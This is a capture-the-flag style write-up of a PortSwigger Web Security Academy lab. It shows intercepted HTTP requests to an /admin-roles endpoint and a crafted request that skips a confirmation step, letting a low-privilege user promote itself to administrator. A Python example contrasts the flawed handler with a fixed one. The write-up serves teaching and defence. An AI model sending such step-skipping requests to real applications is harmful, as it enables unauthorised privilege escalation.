| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Multi-Step Process, Missing Check on Final Step) |
| Difficulty | Practitioner |
| Objective | Log in as wiener:peter and exploit the flawed access controls to promote yourself to administrator |
Multi-Step Process with No Access Control on One Step
Log in as administrator:admin.
The admin panel offers the same upgrade/downgrade user list as the previous lab. Upgrading a user and intercepting the request:

```http
POST /admin-roles HTTP/2
Host: 0a9800d903d9f2bd84ee0e49002c00f9.web-security-academy.net
Cookie: session=sxkCL7Qtec90IKAg74JnnFTD8kidhO53

username=carlos&action=upgrade
```
This time the change is not applied immediately: the server returns a 200 with an "are you sure?" confirmation form, a second step. Clicking "yes" and intercepting that request:

```http
POST /admin-roles HTTP/2
Host: 0a9800d903d9f2bd84ee0e49002c00f9.web-security-academy.net

action=upgrade&confirmed=true&username=carlos
```
So the flow is two steps: step 1 (`action=upgrade&username=...`) returns the confirmation form, and step 2 (`action=upgrade&confirmed=true&username=...`) actually applies the change. Now logging in as wiener:peter.

Sending a POST to /admin-roles that jumps straight to step 2, skipping step 1 entirely:

```http
POST /admin-roles HTTP/2
Host: 0a9800d903d9f2bd84ee0e49002c00f9.web-security-academy.net

action=upgrade&confirmed=true&username=wiener
```
This returns a 302. Following the redirect shows that wiener now has admin privileges: the access control check only ran on step 1, so the confirmation step could be reached directly without it.
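The flaw above reduced to a minimal handler, as an added example that is not the lab's or PortSwigger's code: the flawed version checks the caller's role only when rendering the confirmation form, while the fixed version checks it before dispatching either step. The in-memory role table and the handler signatures are assumptions.

```python
# Added example, not code from the lab or from PortSwigger: a simulated
# /admin-roles handler in its flawed form beside a fixed one. The user->role
# table and the handler signatures are assumptions for illustration.
from urllib.parse import parse_qs


def new_roles():
    """Constructed user->role table mirroring the lab's accounts."""
    return {"administrator": "admin", "wiener": "user", "carlos": "user"}


def _form(body):
    # Flatten "action=upgrade&confirmed=true&username=carlos" into a dict
    return {k: v[0] for k, v in parse_qs(body).items()}


def admin_roles_vulnerable(roles, session_user, body):
    """Flawed handler: only step 1 checks the caller's role."""
    form = _form(body)
    if form.get("confirmed") != "true":
        # Step 1: authorization is checked here, and only here
        if roles.get(session_user) != "admin":
            return 401, "Unauthorized"
        return 200, f"Are you sure you want to {form['action']} {form['username']}?"
    # Step 2 assumes step 1 already ran, so a direct request skips the check
    roles[form["username"]] = "admin" if form["action"] == "upgrade" else "user"
    return 302, "/admin"


def admin_roles_fixed(roles, session_user, body):
    """Fixed handler: the role check runs before any step is dispatched."""
    if roles.get(session_user) != "admin":
        return 401, "Unauthorized"
    form = _form(body)
    action, target = form.get("action"), form.get("username")
    if action not in ("upgrade", "downgrade") or target not in roles:
        return 400, "Bad request"
    if form.get("confirmed") != "true":
        return 200, f"Are you sure you want to {action} {target}?"
    roles[target] = "admin" if action == "upgrade" else "user"
    return 302, "/admin"


if __name__ == "__main__":
    r = new_roles()
    print(admin_roles_vulnerable(r, "wiener", "action=upgrade&confirmed=true&username=wiener"), r["wiener"])
    r = new_roles()
    print(admin_roles_fixed(r, "wiener", "action=upgrade&confirmed=true&username=wiener"), r["wiener"])
```

The same request body that promotes wiener through the flawed handler is rejected with a 401 by the fixed one, while the legitimate two-step flow still works for the administrator.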
Lab solved.